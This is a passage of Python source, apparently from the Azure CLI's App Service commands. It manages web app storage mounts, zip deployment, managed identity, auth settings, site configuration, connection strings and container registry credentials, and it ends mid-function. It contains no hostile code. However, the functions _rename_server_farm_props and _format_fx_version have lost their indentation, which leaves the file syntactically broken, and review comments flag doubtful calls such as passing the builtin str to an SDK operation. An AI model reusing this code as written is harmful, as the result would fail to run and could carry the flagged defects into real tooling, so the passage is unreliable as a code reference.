def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
                                 share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
    """Update an existing Azure storage mount identified by `custom_id`.

    Unspecified fields keep their current values; fails if `custom_id` is
    not already configured.
    """
    from azure.mgmt.web.models import AzureStorageInfoValue
    azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                     'list_azure_storage_accounts', slot)
    # pop the existing entry so the merged config below replaces it cleanly
    existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
    if not existing_account_config:
        raise CLIError("No Azure storage account configuration found with the id '{}'. "
                       "Use 'az webapp config storage-account add' to add a new "
                       "Azure storage account configuration.".format(custom_id))
    # merge: any argument left as None falls back to the existing value
    new_account_config = AzureStorageInfoValue(
        type=storage_type or existing_account_config.type,
        account_name=account_name or existing_account_config.account_name,
        share_name=share_name or existing_account_config.share_name,
        access_key=access_key or existing_account_config.access_key,
        mount_path=mount_path or existing_account_config.mount_path
    )
    azure_storage_accounts.properties[custom_id] = new_account_config
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', azure_storage_accounts.properties,
                                         slot, client)
    if slot_setting:
        # mark this storage configuration as sticky to the slot
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
        if custom_id not in slot_cfg_names.azure_storage_config_names:
            slot_cfg_names.azure_storage_config_names.append(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
    """Deploy a local zip file `src` to the app via the Kudu zipdeploy API,
    then poll the async deployment status until it completes or `timeout`
    (seconds) elapses."""
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    zip_url = scm_url + '/api/zipdeploy?isAsync=true'
    deployment_status_url = scm_url + '/api/deployments/latest'
    import urllib3
    authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers = authorization
    headers['content-type'] = 'application/octet-stream'
    import requests
    import os
    # Read file content
    with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
        zip_content = fs.read()
        # NOTE(review): the POST response is discarded -- an upload failure
        # (e.g. auth error) is only surfaced indirectly by the status poll
        # below; confirm whether the status code should be checked here.
        requests.post(zip_url, data=zip_content, headers=headers)
    # check the status of async deployment
    response = _check_zip_deployment_status(deployment_status_url, authorization, timeout)
    return response
def get_sku_name(tier):
    """Map a pricing-tier code (e.g. 'S1', 'P1V2', case-insensitive) to its
    SKU name; raises CLIError for unknown tiers."""
    tier = tier.upper()
    tier_groups = (
        (('F1', 'FREE'), 'FREE'),
        (('D1', 'SHARED'), 'SHARED'),
        (('B1', 'B2', 'B3', 'BASIC'), 'BASIC'),
        (('S1', 'S2', 'S3'), 'STANDARD'),
        (('P1', 'P2', 'P3'), 'PREMIUM'),
        (('P1V2', 'P2V2', 'P3V2'), 'PREMIUMV2'),
        (('PC2', 'PC3', 'PC4'), 'PremiumContainer'),
        (('EP1', 'EP2', 'EP3'), 'ElasticPremium'),
    )
    for codes, sku in tier_groups:
        if tier in codes:
            return sku
    raise CLIError("Invalid sku(pricing tier), please refer to command help for valid values")
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
                                setting_properties, slot=None, client=None):
    # Dispatch a settings update to either the production-site or the slot
    # variant ('<operation_name>_slot') of the SDK operation.
    client = client or web_client_factory(cli_ctx)
    operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
    # NOTE(review): the bare builtin `str` is passed as a positional argument
    # to the SDK operation -- confirm which parameter slot it is meant to
    # fill; it looks suspicious.
    if slot is None:
        return operation(resource_group_name, name, str, setting_properties)
    return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
    """Fetch the app (or reuse a pre-fetched instance) and normalize it for
    display: renames the plan property and fills in the FTP publishing URL."""
    # when invoked as a helper rather than through a command, the caller may
    # already hold the site object
    webapp = app_instance or _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    _rename_server_farm_props(webapp)
    _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
    return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
    """Generic-update getter: fetch the site (or slot) object unchanged."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
               skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
    """Generic-update setter: push the (already modified) site object found in
    kwargs['parameters'] back via create_or_update (or its slot variant)."""
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
    # rebuild kwargs for the SDK call; the incoming **kwargs is discarded
    kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
                  skip_dns_registration=skip_dns_registration,
                  skip_custom_domain_verification=skip_custom_domain_verification,
                  force_dns_registration=force_dns_registration,
                  ttl_in_seconds=ttl_in_seconds)
    if slot:
        kwargs['slot'] = slot
    return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
    """Generic-update mutator: apply the 'true'/'false' string flags onto the
    site instance and return it; rejects function apps."""
    if 'function' in instance.kind:
        raise CLIError("please use 'az functionapp update' to update this function app")
    # each flag is a 'true'/'false' string; None means "leave unchanged"
    for attr_name, flag in (('client_affinity_enabled', client_affinity_enabled),
                            ('https_only', https_only)):
        if flag is not None:
            setattr(instance, attr_name, flag == 'true')
    return instance
def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Generic-update setter for function apps; rejects non-function sites."""
    instance = kwargs['parameters']
    if 'function' not in instance.kind:
        raise CLIError('Not a function app to update')
    client = web_client_factory(cmd.cli_ctx)
    return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
    """List web apps (optionally within one group), excluding function apps."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in apps if 'function' not in app.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List deleted apps matching the filters, ordered by deleted-site id."""
    deleted = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    return sorted(deleted, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a previously deleted app into an existing site; configuration
    is restored too unless `restore_content_only` is set."""
    request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
    """List function apps (optionally within one group)."""
    apps = _list_app(cmd.cli_ctx, resource_group_name)
    return [app for app in apps if 'function' in app.kind]
def _list_app(cli_ctx, resource_group_name=None):
    """Fetch all sites (subscription-wide or per group) with the plan
    property renamed for display."""
    client = web_client_factory(cli_ctx)
    if resource_group_name:
        apps = list(client.web_apps.list_by_resource_group(resource_group_name))
    else:
        apps = list(client.web_apps.list())
    for app in apps:
        _rename_server_farm_props(app)
    return apps
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
    """Fetch deleted sites, narrowing by group, name, and slot when given
    (name and slot compare case-insensitively)."""
    client = web_client_factory(cli_ctx)
    matches = list(client.deleted_web_apps.list())
    if resource_group_name:
        matches = [site for site in matches if site.resource_group == resource_group_name]
    if name:
        wanted_name = name.lower()
        matches = [site for site in matches if site.deleted_site_name.lower() == wanted_name]
    if slot:
        wanted_slot = slot.lower()
        matches = [site for site in matches if site.slot.lower() == wanted_slot]
    return matches
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
    """Enable a system-assigned managed identity on the app and (when `scope`
    is given) grant it `role` over that scope via the ARM helper."""
    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    def setter(webapp):
        # flip the site to a SystemAssigned identity and wait for completion
        webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)
    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
    """Return the managed-identity block of the app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
    """Disable the managed identity on the app by setting its type to 'None'
    via the same ARM helper used by assign_identity."""
    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    def setter(webapp):
        # clear the identity and wait for the update to complete
        webapp.identity = ManagedServiceIdentity(type='None')
        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)
    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
    """Return the authentication/authorization settings of the app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
                         token_refresh_extension_hours=None, # pylint: disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
                         microsoft_account_client_secret=None, # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
    """Update the app's auth settings.

    Every non-None keyword argument is copied onto the fetched settings
    object by introspecting this function's own frame (hence the
    unused-argument pragmas). Fix: removed a stray debug `print` that leaked
    every setting value (including client secrets) to stdout on each call.
    """
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]
    import inspect
    frame = inspect.currentframe()
    # these arrive as 'true'/'false' strings and must become real booleans
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
    for arg in args[2:]:
        if values.get(arg, None):
            setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
    """List supported runtime stack names for windows (default) or linux apps."""
    client = web_client_factory(cmd.cli_ctx)
    helper = _StackRuntimeHelper(client, linux)
    return [stack['displayName'] for stack in helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
    """Delete a function app (or one of its deployment slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
                  keep_dns_registration=None, slot=None):
    """Delete a web app (or slot), optionally keeping metrics, the emptied plan,
    or the DNS registration."""
    client = web_client_factory(cmd.cli_ctx)
    # The SDK exposes inverted 'delete_*'/'skip_*' switches; each 'keep_*'
    # option maps to an explicit False, otherwise the service default (None).
    delete_metrics = False if keep_metrics else None
    delete_empty_server_farm = False if keep_empty_plan else None
    skip_dns_registration = False if keep_dns_registration else None
    if slot:
        client.web_apps.delete_slot(resource_group_name, name, slot,
                                    delete_metrics=delete_metrics,
                                    delete_empty_server_farm=delete_empty_server_farm,
                                    skip_dns_registration=skip_dns_registration)
    else:
        client.web_apps.delete(resource_group_name, name,
                               delete_metrics=delete_metrics,
                               delete_empty_server_farm=delete_empty_server_farm,
                               skip_dns_registration=skip_dns_registration)
def stop_webapp(cmd, resource_group_name, name, slot=None):
    """Stop a web app (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
    """Start a web app (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
    """Restart a web app (or one of its slots)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
    """Return the SiteConfig resource for a web app (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
    """Return app settings with a 'slotSetting' flag for slot-sticky entries."""
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
    return _build_app_settings_output(result.properties, sticky_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
    """Return connection strings, flagging those configured as slot settings."""
    strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    sticky = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .connection_string_names or []
    return [{'name': key,
             'value': strings.properties[key],
             'slotSetting': key in sticky} for key in strings.properties]
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
    """Return the app's Azure storage-account mounts, flagging slot-sticky ones."""
    client = web_client_factory(cmd.cli_ctx)
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    sticky = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
        .azure_storage_config_names or []
    return [{'name': key,
             'value': accounts.properties[key],
             'slotSetting': key in sticky} for key in accounts.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
    """Attach the FTP publish URL (from the publishing profiles) to *webapp*."""
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    ftp_url = next(profile['publishUrl'] for profile in profiles
                   if profile['publishMethod'] == 'FTP')
    setattr(webapp, 'ftpPublishingUrl', ftp_url)
    return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
    """Set the container image on linux_fx_version or windows_fx_version."""
    fx_version = _format_fx_version(custom_image_name)
    web_app = get_webapp(cmd, resource_group_name, name, slot)
    # 'reserved' marks a Linux plan; 'is_xenon' marks a Windows-container plan
    return update_site_configs(cmd, resource_group_name, name,
                               linux_fx_version=fx_version if web_app.reserved else None,
                               windows_fx_version=fx_version if web_app.is_xenon else None,
                               slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
    """Clear linux_fx_version (a single space resets the setting)."""
    return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
    """Return whichever fx version (linux or windows) is set, else ''."""
    config = get_site_configs(cmd, resource_group_name, name, slot)
    return config.linux_fx_version or config.windows_fx_version or ''
def url_validator(url):
    """Return True when *url* parses with a scheme, network location and path."""
    try:
        parts = urlparse(url)
    except ValueError:
        return False
    return bool(parts.scheme and parts.netloc and parts.path)
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
    """Return the base64-decoded multicontainer (compose/kube) config as bytes."""
    from base64 import b64decode
    fx = _get_fx_version(cmd, resource_group_name, name, slot)
    if not any(fx.startswith(prefix) for prefix in MULTI_CONTAINER_TYPES):
        raise CLIError("Cannot decode config that is not one of the"
                       " following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
    # fx version is '<TYPE>|<base64 payload>'
    return b64decode(fx.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
    """Read a multicontainer config (local path or URL) and base64-encode it."""
    from base64 import b64encode
    if url_validator(file_name):
        config_file_bytes = urlopen(file_name, context=_ssl_context()).read()
    else:
        with open(file_name, 'rb') as f:
            config_file_bytes = f.read()
    # return the raw bytes base64-encoded as a str
    return b64encode(config_file_bytes).decode('utf-8')
# NOTE: update_site_configs discovers its optional arguments via reflection
# (inspect.getargvalues); if the leading non-optional parameters change,
# adjust the args[...] slice in the method body accordingly.
def update_site_configs(cmd, resource_group_name, name, slot=None,
                        linux_fx_version=None, windows_fx_version=None, php_version=None, python_version=None,  # pylint: disable=unused-argument
                        net_framework_version=None,  # pylint: disable=unused-argument
                        java_version=None, java_container=None, java_container_version=None,  # pylint: disable=unused-argument
                        remote_debugging_enabled=None, web_sockets_enabled=None,  # pylint: disable=unused-argument
                        always_on=None, auto_heal_enabled=None,  # pylint: disable=unused-argument
                        use32_bit_worker_process=None,  # pylint: disable=unused-argument
                        min_tls_version=None,  # pylint: disable=unused-argument
                        http20_enabled=None,  # pylint: disable=unused-argument
                        app_command_line=None,  # pylint: disable=unused-argument
                        ftps_state=None,  # pylint: disable=unused-argument
                        generic_configurations=None):
    """Update site configuration of a web app (or slot).

    Non-None keyword arguments are copied by name onto the current SiteConfig
    object via reflection; extra 'generic_configurations' entries (JSON blobs
    or KEY=VALUE pairs) are applied on top.
    """
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if linux_fx_version:
        # custom docker images must not mount the App Service storage volume
        if linux_fx_version.strip().lower().startswith('docker|'):
            update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
        else:
            delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
    import inspect
    frame = inspect.currentframe()
    # these CLI flags arrive as 'true'/'false' strings and must become bools
    bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
                  'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
    # and no simple functional replacement for this deprecating method for 3.5
    args, _, _, values = inspect.getargvalues(frame)  # pylint: disable=deprecated-method
    for arg in args[3:]:
        # BUG FIX: 'slot' is routing information, not a site-config property,
        # so it must not be copied onto the SiteConfig object here.
        if arg not in ('slot', 'generic_configurations') and values.get(arg, None):
            setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
    generic_configurations = generic_configurations or []
    result = {}
    for s in generic_configurations:
        try:
            # a value may be a JSON object covering several properties ...
            result.update(get_json_object(s))
        except CLIError:
            # ... or a plain KEY=VALUE pair
            config_name, value = s.split('=', 1)
            result[config_name] = value
    for config_name, value in result.items():
        setattr(configs, config_name, value)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove the named app settings, un-sticking any slot settings removed."""
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting in setting_names:
        app_settings.properties.pop(setting, None)
        if slot_cfg_names.app_setting_names and setting in slot_cfg_names.app_setting_names:
            slot_cfg_names.app_setting_names.remove(setting)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_application_settings',
                                         app_settings.properties, slot, client)
    return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
    """Remove one storage-account mount, un-sticking it if it was a slot setting."""
    accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                       'list_azure_storage_accounts', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    accounts.properties.pop(custom_id, None)
    sticky = slot_cfg_names.azure_storage_config_names
    if sticky and custom_id in sticky:
        sticky.remove(custom_id)
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_azure_storage_accounts', accounts.properties,
                                         slot, client)
    return result.properties
def _ssl_context():
    """Return an SSL context, with fallbacks for old Pythons and Cloud Shell on Windows."""
    import platform
    # BUG FIX: the original called sys.platform.system(); sys.platform is a
    # string, so that always raised AttributeError. platform.system() is the
    # intended call for the OS name.
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
        try:
            return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
    """Shape a settings dict into [{'name', 'value', 'slotSetting'}, ...],
    masking credential-bearing entries first."""
    sticky = slot_cfg_names or []
    return [{'name': key,
             'value': app_settings[key],
             'slotSetting': key in sticky}
            for key in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
                              settings=None, slot=None, slot_settings=None):
    """Add or update connection strings; entries given via *slot_settings* are
    additionally marked slot-sticky.

    Each entry is 'NAME=value'; surrounding quotes on the value are stripped.
    """
    from azure.mgmt.web.models import ConnStringValueTypePair
    if not settings and not slot_settings:
        raise CLIError('Usage Error: --settings |--slot-settings')
    settings = settings or []
    slot_settings = slot_settings or []
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    for name_value in settings + slot_settings:
        # split at the first '=', connection string should not have '=' in the name
        conn_string_name, value = name_value.split('=', 1)
        # strip away the quotes used as separators; guard the empty-value case
        # ('NAME='), which previously raised IndexError on value[0]
        if value and value[0] in ["'", '"']:
            value = value[1:-1]
        conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
                                                                            type=connection_string_type)
    client = web_client_factory(cmd.cli_ctx)
    result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                         'update_connection_strings',
                                         conn_strings.properties, slot, client)
    if slot_settings:
        # record the new slot-sticky names alongside the existing ones
        new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
        slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
        slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
        slot_cfg_names.connection_string_names += new_slot_setting_names
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
    """Remove the named connection strings, un-sticking any slot settings removed."""
    conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                           'list_connection_strings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
    sticky_changed = False
    for setting in setting_names:
        conn_strings.properties.pop(setting, None)
        if slot_cfg_names.connection_string_names and setting in slot_cfg_names.connection_string_names:
            slot_cfg_names.connection_string_names.remove(setting)
            sticky_changed = True
    if sticky_changed:
        client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
    return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
                                       'update_connection_strings',
                                       conn_strings.properties, slot, client)
# App settings that drive single-container configuration; these are the ones
# surfaced by the container 'show' commands and removed on container 'delete'.
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
                              'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
# Settings whose values are masked (set to None) in command output.
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
                              docker_custom_image_name=None, docker_registry_server_user=None,
                              websites_enable_app_service_storage=None, docker_registry_server_password=None,
                              multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
    """Update container (docker) settings of a web app (or slot).

    Builds a list of 'KEY=VALUE' app settings from the supplied arguments,
    looks up ACR admin credentials when none were given for an *.azurecr.io
    registry, applies the settings, optionally sets the image / multicontainer
    config on the site config, and returns the masked container settings.
    """
    settings = []
    if docker_registry_server_url is not None:
        settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
    # no credentials supplied but the registry is an Azure Container Registry:
    # try the ACR admin credentials as a convenience
    if (not docker_registry_server_user and not docker_registry_server_password and
            docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
        logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
        parsed = urlparse(docker_registry_server_url)
        # registry name is the first label of the host (URL may lack a scheme)
        registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
        try:
            docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
        except Exception as ex: # pylint: disable=broad-except
            logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
    if docker_registry_server_user is not None:
        settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
    if docker_registry_server_password is not None:
        settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
    if docker_custom_image_name is not None:
        _add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
    if websites_enable_app_service_storage:
        settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
    if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
        update_app_settings(cmd, resource_group_name, name, settings, slot)
    # re-read so the returned view reflects what the service actually stored
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    if multicontainer_config_file and multicontainer_config_type:
        encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
        linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
        update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
    elif multicontainer_config_file or multicontainer_config_type:
        # both options are required together; warn rather than fail
        logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
    return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
                                                                          slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
                                          docker_custom_image_name=None, docker_registry_server_user=None,
                                          docker_registry_server_password=None, slot=None):
    """Function-app variant of update_container_settings (no storage toggle,
    no multicontainer options)."""
    return update_container_settings(cmd, resource_group_name, name,
                                     docker_registry_server_url=docker_registry_server_url,
                                     docker_custom_image_name=docker_custom_image_name,
                                     docker_registry_server_user=docker_registry_server_user,
                                     websites_enable_app_service_storage=None,
                                     docker_registry_server_password=docker_registry_server_password,
                                     multicontainer_config_type=None,
                                     multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
    """Look up admin credentials for an Azure Container Registry by name.

    Raises CLIError when the registry is not found (or ambiguous) or when the
    admin user is disabled.
    """
    from azure.mgmt.containerregistry import ContainerRegistryManagementClient
    from azure.cli.core.commands.parameters import get_resources_in_subscription
    client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
    result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
    # BUG FIX: compare case-insensitively on both sides; the name parsed from a
    # login-server URL may not match the resource's casing
    result = [item for item in result if item.name.lower() == registry_name.lower()]
    if not result or len(result) > 1:
        raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
    resource_group_name = parse_resource_id(result[0].id)['resource_group']
    registry = client.get(resource_group_name, registry_name)
    if registry.admin_user_enabled:  # pylint: disable=no-member
        cred = client.list_credentials(resource_group_name, registry_name)
        return cred.username, cred.passwords[0].value
    raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
                   "credentials or run 'az acr update -n {} --admin-enabled true' to enable "
                   "admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
    """Clear the container image and remove all container-related app settings."""
    _delete_linux_fx_version(cmd, resource_group_name, name, slot)
